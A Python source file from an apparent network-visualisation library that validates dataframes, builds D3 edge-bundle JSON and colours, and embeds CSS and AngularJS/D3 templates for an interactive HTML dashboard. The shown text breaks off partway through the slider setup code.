css_text = css_text_template_bundle.substitute({'backgroundColor': backgroundColor
, 'foregroundColor': foregroundColor
, 'display_filter_type': dispFilterType
, 'adj_score_top': dash_adj_score_top})
html = html_template_bundle.substitute({'css_text': css_text, 'js_text': js_text})
html_file = html_file.split(".")[0] + "_dashboard.html"
with open(html_file, 'w') as f:
f.write(html)
f.close()
print("HTML writen to {}".format(html_file))
wb.open('file://' + os.path.realpath(html_file))
def __checkNodes(self, nodes):
if not isinstance(nodes, pd.DataFrame):
print("Error: A dataframe was not entered. Please check your data.")
sys.exit()
nodes_col = ['Name', 'Label']
for value in nodes_col:
if value not in nodes.columns:
print("Error: Nodes dataframe items not valid. Include the following {}.".format(' and '.join(nodes_col)))
sys.exit()
return nodes
def __checkEdges(self, edges):
if not isinstance(edges, pd.DataFrame):
print("Error: A dataframe was not entered. Please check your data.")
sys.exit()
edges_col = ['start_index', 'start_name', 'start_label', 'end_index', 'end_name', 'end_label', ]
for value in edges_col:
if value not in edges.columns:
print("Error: Edges dataframe items not valid. Include the following {} , and either \"Pvalue\" or \"Score\" and \"sign\".".format(', '.join(edges_col)))
sys.exit()
if "score" not in edges.columns:
print("Error: Edges dataframe does not contain \"Score\".")
sys.exit()
if 'pvalue' not in edges.columns:
self.__pvalue_matrix_flag = False;
else:
self.__pvalue_matrix_flag = True;
return edges
def __paramCheck(self, html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcAngle, arc_cmap):
nodes = self.__nodes
col_list = list(nodes.columns) + ['none']
cmap_list = list(matplotlib.cm.cmaps_listed) + list(matplotlib.cm.datad)
cmap_list_r = [cmap + '_r' for cmap in cmap_list]
cmap_list = cmap_list + cmap_list_r
if not isinstance(html_file, str):
print("Error: Html file is not valid. Choose a string value.")
sys.exit()
else:
html_end = html_file.split(".")[-1]
if html_end != "html":
print("Error: Html file extension is not 'html'. Please use '.html' extension.")
sys.exit()
if not isinstance(innerRadiusOffset, float):
if not isinstance(innerRadiusOffset, int):
print("Error: Inner radius offset is not valid. Choose a float or integer value.")
sys.exit()
if not isinstance(blockSeparation, float):
if not isinstance(blockSeparation, int):
print("Error: Block separation is not valid. Choose a float or integer value.")
sys.exit()
if not isinstance(linkFadeOpacity, float):
if not isinstance(linkFadeOpacity, int):
print("Error: Link fade opacity is not valid. Choose a float or integer value.")
sys.exit()
if not isinstance(mouseOver, bool):
print("Error: Mouse over is not valid. Choose either \"True\" or \"False\".")
sys.exit()
if not isinstance(fontSize, float):
if not isinstance(fontSize, int):
print("Error: Font size is not valid. Choose a float or integer value.")
sys.exit()
if not matplotlib.colors.is_color_like(backgroundColor):
print("Error: Background colour is not valid. Choose a valid colour value.")
sys.exit()
if not matplotlib.colors.is_color_like(foregroundColor):
print("Error: Slider text colour is not valid. Choose a valid colour value.")
sys.exit()
if not isinstance(node_data, list):
print("Error: Node data is not valid. Use a list.")
sys.exit()
else:
for node_item in node_data:
if node_item not in col_list:
print("Error: Node data item not valid. Choose one of {}.".format(', '.join(col_list)))
sys.exit()
if "Name" not in node_data:
print("Error: Column \"Name\" should be node data. Please correct")
sys.exit()
if "Label" not in node_data:
print("Error: Column \"Label\" should be node data. Please correct")
sys.exit()
if nodeColorScale.lower() not in ["linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal"]:
print("Error: Node color scale type not valid. Choose either \"linear\", \"reverse_linear\", \"log\", \"reverse_log\", \"square\", \"reverse_square\", \"area\", \"reverse_area\", \"volume\", \"reverse_volume\", \"ordinal\", \"reverse_ordinal\".")
sys.exit()
if node_color_column not in col_list:
print("Error: Node color column not valid. Choose one of {}.".format(', '.join(col_list)))
sys.exit()
else:
if node_color_column != 'none':
node_color_values = np.array(nodes[node_color_column].values)
if ((nodeColorScale != 'ordinal') and (nodeColorScale != 'reverse_ordinal')):
try:
float(node_color_values[0])
except ValueError:
if not matplotlib.colors.is_color_like(node_color_values[0]):
print("Error: Node colour column is not valid. While colorScale is not ordinal or reverse_ordinal, choose a column containing HTML/CSS name, hex code, (R,G,B) tuples, floats or integer values")
sys.exit()
if not isinstance(node_cmap, str):
print("Error: Node CMAP is not valid. Choose a string value.")
sys.exit()
else:
if node_cmap not in cmap_list:
print("Error: Node CMAP is not valid. Choose one of the following: {}.".format(', '.join(cmap_list)))
sys.exit()
if edgeColorScale.lower() not in ["linear", "reverse_linear", "log", "reverse_log", "square", "reverse_square", "area", "reverse_area", "volume", "reverse_volume", "ordinal", "reverse_ordinal"]:
print("Error: Node color scale type not valid. Choose either \"linear\", \"reverse_linear\", \"log\", \"reverse_log\", \"square\", \"reverse_square\", \"area\", \"reverse_area\", \"volume\", \"reverse_volume\", \"ordinal\", \"reverse_ordinal\".")
sys.exit()
if edge_color_value.lower() not in ["sign", "pvalue", "score"]:
print("Error: Colour scale type not valid. Choose either \"Pvalue\", \"Score\" or \"Sign\".")
sys.exit()
if not isinstance(edge_cmap, str):
print("Error: Edge CMAP is not valid. Choose a string value.")
sys.exit()
else:
if edge_cmap not in cmap_list:
print("Error: Edge CMAP is not valid. Choose one of the following: {}.".format(', '.join(cmap_list)))
sys.exit()
if not isinstance(addArcs, bool):
print("Error: Add arcs is not valid. Choose either \"True\" or \"False\".")
sys.exit()
if not isinstance(arcRadiusOffset, float):
if not isinstance(arcRadiusOffset, int):
print("Error: Arc radius offset is not valid. Choose a float or integer value.")
sys.exit()
if not isinstance(extendArcAngle, float):
if not isinstance(extendArcAngle, int):
print("Error: Extend arc angle is not valid. Choose a float or integer value.")
sys.exit()
if not isinstance(arc_cmap, str):
print("Error: Arc CMAP is not valid. Choose a string value.")
sys.exit()
else:
if arc_cmap not in cmap_list:
print("Error: Arc CMAP is not valid. Choose one of the following: {}.".format(', '.join(cmap_list)))
sys.exit()
return html_file, innerRadiusOffset, blockSeparation, linkFadeOpacity, mouseOver, fontSize, backgroundColor, foregroundColor, node_data, nodeColorScale, node_color_column, node_cmap, edgeColorScale, edge_color_value, edge_cmap, addArcs, arcRadiusOffset, extendArcAngle, arc_cmap
def __df_to_flareJson(self, nodes, edges):
"""Convert dataframes into nested JSON as in flare files used for D3.js"""
nodeList = list(nodes.columns)
if "Idx" in nodeList:
nodeList.remove('Idx')
if "Label" in nodeList:
nodeList.remove('Label')
if "color" in nodeList:
nodeList.remove('color')
if "block" in nodeList:
nodeList.remove('block')
if "block_color" in nodeList:
nodeList.remove('block_color')
nodeData = nodes[nodeList]
nodeDataList = list(nodeData.drop(columns=['Name']).columns)
flare = dict()
d = {"Name": "flare", "children": []}
for index, row in edges.iterrows():
row_list = list(row.index)
parent_index = row['start_index']
parent_name = row['start_name']
parent_color = row['start_color']
parent_label = row['start_label']
child_index = row['end_index']
child_name = row['end_name']
child_color = row['end_color']
child_label = row['end_label']
link_score = row['score']
link_sign = row['sign']
link_color = row['color']
# Make a list of keys
key_list = []
for item in d['children']:
key_list.append(item['id'])
# if parent index is NOT a key in flare.JSON, append it
if parent_index not in key_list:
if 'start_block' in row_list:
parent_block = row['start_block']
parent_block_color = row['start_block_color']
parent_dic = {"id": parent_index, "Name": parent_name, "Label": parent_label, "node_color": parent_color, "block": parent_block, "block_color": parent_block_color}
else:
parent_dic = {"id": parent_index, "Name": parent_name, "Label": parent_label, "node_color": parent_color}
for col in nodeDataList:
parent_dic[col] = list(nodeData[nodeData.Name.isin([parent_name])][col])[0]
if 'end_block' in row_list:
child_block = row['end_block']
child_block_color = row['end_block_color']
if 'pvalue' in row_list:
link_pvalue = row['pvalue']
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "block": child_block, "block_color": child_block_color, "link_color": link_color}
else:
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "block": child_block, "block_color": child_block_color, "link_color": link_color}
else:
if 'pvalue' in row_list:
link_pvalue = row['pvalue']
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
else:
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_color": link_color}
for col in nodeDataList:
child_dic[col] = list(nodeData[nodeData.Name.isin([child_name])][col])[0]
parent_dic["children"] = [child_dic]
d['children'].append(parent_dic)
# if parent index IS a key in flare.json, add a new child to it
else:
if 'end_block' in row_list:
child_block = row['end_block']
child_block_color = row['end_block_color']
if 'pvalue' in row_list:
link_pvalue = row['pvalue']
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "block": child_block, "block_color": child_block_color, "link_color": link_color}
else:
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "block": child_block, "block_color": child_block_color, "link_color": link_color}
else:
if 'pvalue' in row_list:
link_pvalue = row['pvalue']
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
else:
child_dic = {"id": child_index, "Name": child_name, "Label": child_label, "node_color": child_color, "link_score": link_score, "link_sign": link_sign, "link_color": link_color}
for col in nodeDataList:
child_dic[col] = list(nodeData[nodeData.Name.isin([child_name])][col])[0]
d['children'][key_list.index(parent_index)]['children'].append(child_dic)
flare = d
return flare
def __df_to_Json(self, nodes, edges):
flare = self.__df_to_flareJson(nodes, edges);
nodeList = list(nodes.columns)
if "Idx" in nodeList:
nodeList.remove('Idx')
if "Label" in nodeList:
nodeList.remove('Label')
if "color" in nodeList:
nodeList.remove('color')
if "block" in nodeList:
nodeList.remove('block')
if "block_color" in nodeList:
nodeList.remove('block_color')
nodeData = nodes[nodeList]
nodeDataList = list(nodeData.drop(columns=['Name']).columns)
flareString = ""
bundleJsonArray = []
completeChildList = []
for key, value in flare.items():
if isinstance(value, str):
flareString = value
elif isinstance(value, list):
for idx, val in enumerate(value):
if "start_block" in edges.columns:
dParent = {"id": "", "Name": "", "Label": "", "node_color": "", "block": "", "block_color": ""}
for col in nodeDataList:
dParent[col] = ""
dParent["imports"] = {}
parent_index = str(value[idx]['id'])
parentBlock = str(value[idx]['block'])
parentBlockColor = str(value[idx]['block_color'])
flareParentIndex = flareString + "#" + parentBlock + "#" + parent_index
dParent["block"] = parentBlock
dParent["block_color"] = parentBlockColor
else:
parent_index = str(value[idx]['id'])
dParent = {"id": "", "Name": "", "Label": "", "node_color": ""}
for col in nodeDataList:
dParent[col] = ""
dParent["imports"] = {}
flareParentIndex = flareString + "#" + parent_index
parentName = str(value[idx]['Name'])
parentLabel = str(value[idx]['Label'])
parentColor = str(value[idx]['node_color'])
dParent["id"] = flareParentIndex
dParent["Name"] = parentName
dParent["Label"] = parentLabel
dParent["node_color"] = parentColor
for col in nodeDataList:
dParent[col] = str(value[idx][col])
childList = value[idx]['children']
for child in childList:
child_keys = list(child.keys())
link_score = float(child['link_score'])
link_sign = float(child['link_sign'])
if 'link_pvalue' in child_keys:
link_pvalue = float(child['link_pvalue'])
link_color = str(child['link_color'])
if "start_block" in edges.columns:
dChild = {"id": "", "Name": "", "Label": "", "node_color": "", "block": "", "block_color": ""}
for col in nodeDataList:
dChild[col] = ""
dChild["imports"] = {}
child_index = str(child['id'])
childBlock = str(child['block'])
childBlockColor = str(child['block_color'])
flareChildIndex = flareString + "#" + childBlock + "#" + child_index
dChild["block"] = childBlock
dChild["block_color"] = childBlockColor
else:
child_index = str(child['id'])
dChild = {"id": "", "Name": "", "Label": "", "node_color": ""}
for col in nodeDataList:
dChild[col] = ""
dChild["imports"] = {}
flareChildIndex = flareString + "#" + child_index
childName = str(child['Name'])
childLabel = str(child['Label'])
childColor = str(child['node_color'])
if 'link_pvalue' in child_keys:
dParent["imports"][flareChildIndex] = {"link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
else:
dParent["imports"][flareChildIndex] = {"link_score": link_score, "link_sign": link_sign, "link_color": link_color}
dChild["id"] = flareChildIndex
dChild["Name"] = childName
dChild["Label"] = childLabel
dChild["node_color"] = childColor
for col in nodeDataList:
dChild[col] = str(child[col])
if 'link_pvalue' in child_keys:
dChild["imports"][flareParentIndex] = {"link_score": link_score, "link_sign": link_sign, "link_pvalue": link_pvalue, "link_color": link_color}
else:
dChild["imports"][flareParentIndex] = {"link_score": link_score, "link_sign": link_sign, "link_color": link_color}
completeChildList.append(dChild)
bundleJsonArray.append(dParent)
bundleJsonArray.extend(completeChildList)
return bundleJsonArray;
def __get_colors(self, colorScale, x, cmap):
scaled_colors = transform(x, colorScale, 0, 1)
return cmap(scaled_colors)
def __node_color(self, nodes, edges):
colorsHEX = []
nodeCmap = plt.cm.get_cmap(self.__node_cmap)
if self.__node_color_column == 'none':
nodes["color"] = "#000000"
else:
node_color_values = nodes[self.__node_color_column].values
try:
float(node_color_values[0])
node_color_values = np.array([float(i) for i in node_color_values])
colorsRGB = self.__get_colors(self.__nodeColorScale, node_color_values, nodeCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
nodes["color"] = colorsHEX
except ValueError:
if matplotlib.colors.is_color_like(node_color_values[0]):
nodes["color"] = node_color_values
else:
if ((self.__nodeColorScale != 'ordinal') and (self.__nodeColorScale != 'reverse_ordinal')):
print("Error: Node colour column is not valid. While colorScale is not ordinal or reverse_ordinal, choose a column containing HTML/CSS name, hex code, (R,G,B) tuples, floats or integer values.")
sys.exit()
else:
colorsRGB = self.__get_colors(self.__nodeColorScale, node_color_values, nodeCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
nodes["color"] = colorsHEX
node_color = nodes['color'].reset_index().rename(columns={"index": "start_index"})
edges = pd.merge(edges, node_color, how='left', on='start_index').rename(columns={"color": "start_color"})
node_color = node_color.rename(columns={"start_index": "end_index"})
edges = pd.merge(edges, node_color, how='left', on='end_index').rename(columns={"color": "end_color"})
return nodes, edges
def __block_color(self, nodes, edges):
colorsHEX = []
arcCmap = plt.cm.get_cmap(self.__arc_cmap)
if self.__addArcs and ('Block' in nodes.columns):
if 'block_color' in nodes.columns:
block_color_values = nodes['block_color'].values
if not matplotlib.colors.is_color_like(block_color_values[0]):
print("Error: Block colour column is not valid. Choose a column containing HTML/CSS name, hex code, or (R,G,B) tuples.")
sys.exit()
else:
colorsRGB = self.__get_colors('ordinal', nodes['Block'].values, arcCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
nodes["block_color"] = colorsHEX
block_color = nodes['block_color'].reset_index().rename(columns={"index": "start_index"})
edges = pd.merge(edges, block_color, how='left', on='start_index').rename(columns={"block_color": "start_block_color"})
block_color = block_color.rename(columns={"start_index": "end_index"})
edges = pd.merge(edges, block_color, how='left', on='end_index').rename(columns={"block_color": "end_block_color"})
return nodes, edges
def __edge_color(self, edges):
colorsHEX = []
edgeCmap = plt.cm.get_cmap(self.__edge_cmap) # Sets the color palette for the edges
#signs = edges['sign'].values
if "pvalue" in edges.columns:
if "start_block" in edges.columns:
edges_color = edges[['start_index', 'start_name', 'start_color', 'start_label', 'start_block', 'start_block_color', 'end_index', 'end_name', 'end_color', 'end_label', 'end_block', 'end_block_color', 'score', 'sign', 'pvalue']]
else:
edges_color = edges[['start_index', 'start_name', 'start_color', 'start_label', 'end_index', 'end_name', 'end_color', 'end_label', 'score', 'sign', 'pvalue']]
else:
if "start_block" in edges.columns:
edges_color = edges[['start_index', 'start_name', 'start_color', 'start_label', 'start_block', 'start_block_color', 'end_index', 'end_name', 'end_color', 'end_label', 'end_block', 'end_block_color', 'score', 'sign']]
else:
edges_color = edges[['start_index', 'start_name', 'start_color', 'start_label', 'end_index', 'end_name', 'end_color', 'end_label', 'score', 'sign']]
if self.__edge_color_value.lower() == "sign":
for i in range(edgeCmap.N):
colorsHEX.append(matplotlib.colors.rgb2hex(edgeCmap(i)[:3]))
signColors = []
for sign in edges_color['sign'].values:
if sign > 0:
signColors.append(colorsHEX[-1])
else:
signColors.append(colorsHEX[0])
edges_color = edges_color.assign(color=pd.Series(signColors, index=edges_color.index))
elif self.__edge_color_value.lower() == "score":
colorsRGB = self.__get_colors(self.__edgeColorScale, edges_color['score'].values, edgeCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
edges_color = edges_color.assign(color=pd.Series(colorsHEX, index=edges_color.index))
elif self.__edge_color_value.lower() == "pvalue":
if "pvalue" in edges_color.columns:
colorsRGB = self.__get_colors(self.__edgeColorScale, edges_color['pvalue'].values, edgeCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
edges_color = edges_color.assign(color=pd.Series(colorsHEX, index=edges_color.index))
else:
print("Pvalue in not a column in this dataset. Now choosing score as a color scale.")
colorsRGB = self.__get_colors(self.__edgeColorScale, edges_color['score'].values, edgeCmap)[:, :3]
for rgb in colorsRGB:
colorsHEX.append(matplotlib.colors.rgb2hex(rgb))
edges_color = edges_color.assign(color=pd.Series(colorsHEX, index=edges_color.index))
return edges_color
def __getCSS(self):
css_text = '''
body {background-color: $backgroundColor;}
.node {
font: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.node:hover,
.node--source,
.node--target {
stroke-opacity: 1.0;
font-weight: bold;
}
.node:hover,
.link--source,
.link--target {
stroke-opacity: 1.0;
font-weight: bold;
stroke-width: 4px;
}
.link {
stroke-opacity: 0.4;
fill: none;
pointer-events: none;
}
#edgeBundlePanel {
position: relative;
width: 80%;
height: 80%;
margin: 0 auto;
margin-top: auto;
margin-bottom: auto;
margin-left: auto;
margin-right: auto;
}
#edgeBundle {
margin-top: 50px;
}
.row {
padding-left: 15px;
}
#filterType {
display: $display_filter_type;
position: relative;
top: 0px;
left: 0px;
color: $foregroundColor;
}
#scoreSelect {
display: inline-block;
position: absolute;
top: $adj_score_top;
left: 15px;
color: $foregroundColor;
}
#abs_slider,
#pos_slider,
#neg_slider,
#pvalue_slider,
#tension_slider {
position: relative;
top: 35px;
}
#scoreSelect {
display: block;
}
#save {
position: relative;
top: 3em;
left: 0px;
color: $foregroundColor;
}
.abs_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pos_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.neg_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pvalue_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.tension_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.abs_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pos_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.neg_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pvalue_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.tension_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto;
/* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.abs_slider.rzslider .rz-pointer:after {
display: none;
}
.pos_slider.rzslider .rz-pointer:after {
display: none;
}
.neg_slider.rzslider .rz-pointer:after {
display: none;
}
.pvalue_slider.rzslider .rz-pointer:after {
display: none;
}
.tension_slider.rzslider .rz-pointer:after {
display: none;
}
h3, text {
font-family: sans-serif;
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Safari */
-khtml-user-select: none; /* Konqueror HTML */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently supported by Chrome and Opera */
}
'''
return css_text
def __getCSSdashboard(self):
css_text = '''
body {background-color: $backgroundColor;}
.node {
font: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.node:hover,
.node--source,
.node--target {
stroke-opacity: 1.0;
font-weight: bold;
}
.node:hover,
.link--source,
.link--target {
stroke-opacity: 1.0;
font-weight: bold;
stroke-width: 4px;
}
.link {
stroke-opacity: 0.4;
fill: none;
}
.link--source {
stroke-opacity: 1.0;
font-weight: 800;
stroke-width: 4px;
}
.link--target {
stroke-opacity: 1.0;
}
#edgeBundlePanel {
position: relative;
width: 65%;
height: 65%;
margin: 0 auto;
margin-top: auto;
margin-bottom: auto;
margin-left: auto;
margin-right: auto;
}
#filterType {
display: $display_filter_type;
position: relative;
top: 0px;
left: 0px;
color: $foregroundColor;
}
#scoreSelect {
display: inline-block;
position: absolute;
top: $adj_score_top;
left: 5px;
color: $foregroundColor;
}
#abs_slider, #pos_slider, #neg_slider, #pvalue_slider, #tension_slider {
position: relative;
top: 45px;
}
#scoreSelect {
display: block;
}
#save {
position: relative;
top: 3em;
left: 0px;
color: $foregroundColor;
}
.abs_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pos_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.neg_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.pvalue_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.tension_slider.rzslider .rz-bar {
background: #D3D3D3;
height: 2px;
}
.abs_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pos_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.neg_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.pvalue_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.tension_slider.rzslider .rz-pointer {
width: 8px;
height: 20px;
top: auto; /* to remove the default positioning */
bottom: 0;
background-color: #333;
border-top-left-radius: 3px;
border-top-right-radius: 3px;
}
.abs_slider.rzslider .rz-pointer:after {
display: none;
}
.pos_slider.rzslider .rz-pointer:after {
display: none;
}
.neg_slider.rzslider .rz-pointer:after {
display: none;
}
.pvalue_slider.rzslider .rz-pointer:after {
display: none;
}
.tension_slider.rzslider .rz-pointer:after {
display: none;
}
h3, text {
font-family: sans-serif;
-webkit-touch-callout: none; /* iOS Safari */
-webkit-user-select: none; /* Safari */
-khtml-user-select: none; /* Konqueror HTML */
-moz-user-select: none; /* Firefox */
-ms-user-select: none; /* Internet Explorer/Edge */
user-select: none; /* Non-prefixed version, currently supported by Chrome and Opera */
}
td:nth-child(odd) {
background-color: #eee;
font-weight: bold;
}
'''
return css_text
def __getJS(self):
js_text = '''
var flareData = $flareData
var pvalues = [];
var p_scores = [];
var n_scores = [];
var abs_scores = [];
var canvas = document.getElementById("edgeBundlePanel");
var edgeBundle = d3.select(canvas).append("svg").attr("id", "edgeBundle");
var redrawCount = 0;
var prevRedrawCount = 0;
var app = angular.module('rzSliderDemo', ['rzSlider']);
function redraw(){
if (redrawCount !== prevRedrawCount) {
setTimeout(function(){
window.location.reload();
});
window.location.reload();
}
prevRedrawCount = redrawCount;
redrawCount = redrawCount+1;
var diameter = canvas.clientWidth;
canvas.style.height = diameter;
var radius = diameter / 2;
var innerRadius = radius - $innerRadiusOffset;
var cluster = d3.cluster()
.separation(function(a, b) { return (a.parent == b.parent ? 1 : $blockSeparation ) })
.size([360, innerRadius]);
edgeBundle.selectAll("*").remove();
edgeBundle = d3.select("svg#edgeBundle")
.attr("width", diameter)
.attr("height", diameter)
.append("g")
.attr("transform", "translate(" + radius + "," + radius + ")")
.append("g");
var node = edgeBundle.selectAll(".node");
var link = edgeBundle.selectAll(".link");
var linkLine = updateBundle(flareData); //Initial generation of bundle to populate arrays
if ("$pmFlag" == "true") {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'min_pvalue': 0
, 'max_pvalue': 1
, 'tension': 0.85};
} else {
var currValues = {'max_abs_score': Number(d3.max(abs_scores))
, 'min_abs_score': 0
, 'min_p_score': 0
, 'max_p_score': Number(d3.max(p_scores))
, 'min_n_score': Number(d3.min(n_scores))
, 'max_n_score': 0
, 'tension': 0.85};
}
String.prototype.trimLeft = function(charlist) {
if (charlist === undefined)
charlist = "\s";
return this.replace(new RegExp("^[" + charlist + "]+"), "");
};
Number.prototype.countDecimals = function () {
if(Math.floor(this.valueOf()) === this.valueOf()) return 0;
var value = 0;
var check = this.toString().includes("e-");
if (check) {
var value = this.toString().split("-")[1];
} else {
var value1 = this.toString().split(".")[1];
var value2 = value1.trimLeft("0");
var value = value1.length - value2.length + 1;
}
return value
}
app.controller('MainCtrl', function ($$scope, $$timeout) {
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = true;
$$scope.pvalue_visible = false;
$$scope.pos_toggle = function () {
if (!$$scope.pos_visible){
$$scope.pos_visible = !$$scope.pos_visible;
$$scope.abs_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.neg_toggle = function () {
if (!$$scope.neg_visible){
$$scope.neg_visible = !$$scope.neg_visible;
$$scope.pos_visible = false;
$$scope.abs_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.abs_toggle = function () {
if (!$$scope.abs_visible){
$$scope.abs_visible = !$$scope.abs_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.pvalue_visible = false;
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
}
};
$$scope.pvalue_toggle = function () {
if ("$pmFlag" == "true") {
if (!$$scope.pvalue_visible){
$$scope.pvalue_visible = !$$scope.pvalue_visible;
$$scope.pos_visible = false;
$$scope.neg_visible = false;
$$scope.abs_visible = false;
}
} else {
$$scope.pvalue_visible = false;
$$scope.pos_visible = true;
$$scope.neg_visible = true;
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
$$scope.score_toggle = function () {
if ("$pmFlag" == "true") {
$$scope.pvalue_visible = !$$scope.pvalue_visible;
} else {
$$scope.pvalue_visible = false;
}
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
$$scope.pos_visible = true;
} else if (form_val == "NegScoreRadio") {
$$scope.neg_visible = true;
} else if (form_val == "AbsScoreRadio") {
$$scope.abs_visible = true;
}
$$timeout(function () {
$$scope.$$broadcast('rzSliderForceRender');
});
};
var sliderScoreDecimalPlaces = 6;
$$scope.abs_slider = {
minValue: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(abs_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(abs_scores).toFixed(sliderScoreDecimalPlaces)),
step: Number(1/Math.pow(10, sliderScoreDecimalPlaces)),
precision: sliderScoreDecimalPlaces,
getSelectionBarColor: function() { return '#2AE02A'; },
getPointerColor: function() { return '#D3D3D3'; },
pointerSize: 1,
onChange: function () {
var absScoreMinValue = $$scope.abs_slider.minValue
var absScoreMaxValue = $$scope.abs_slider.maxValue
var tension = currValues.tension;
currValues['min_abs_score'] = absScoreMinValue;
currValues['max_abs_score'] = absScoreMaxValue;
//Filter all links out and update links
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
//Apply new filter and update links
var FlareData = filterData(absScoreMinValue, absScoreMaxValue, 'score_abs');
var linkLine = updateBundle(FlareData);
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr('d', d => line(d.source.path(d.target)));
}
}
};
if (p_scores.length != 0) {
$$scope.pos_slider = {
minValue: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
maxValue: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
options: {
showSelectionBar: true,
floor: Number(d3.min(p_scores).toFixed(sliderScoreDecimalPlaces)),
ceil: Number(d3.max(p_scores).toFixed(sliderScoreDecimalPlaces)),
